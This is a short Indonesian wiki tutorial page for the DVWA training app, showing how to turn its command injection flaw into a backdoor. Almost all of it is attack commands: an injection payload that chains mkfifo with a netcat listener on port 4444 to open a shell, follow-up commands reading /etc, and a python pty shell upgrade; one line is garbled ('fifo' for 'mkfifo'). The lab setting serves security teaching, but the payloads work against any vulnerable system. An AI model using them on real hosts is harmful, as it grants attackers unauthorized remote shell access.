DVWA: Command Injection Back Door

From OnnoWiki
Revision as of 05:14, 23 October 2018 by Onnowpurbo (talk | contribs)
Jump to navigation Jump to search

Backdoor menggunakan perintah

fifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe

Dari command injection di DVWA masukan

192.168.43.1;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe

dimana 192.168.43.1 adalah salah satu IP mesin di jaringan

Selanjutnya kita bisa memasukan perintah2 shell seperti

ls
cd /etc
cat <namafile>
dsb

Percobaan untuk memperoleh shell

python -c 'import pty; pty.spawn("/bin/sh")'


Pranala Menarik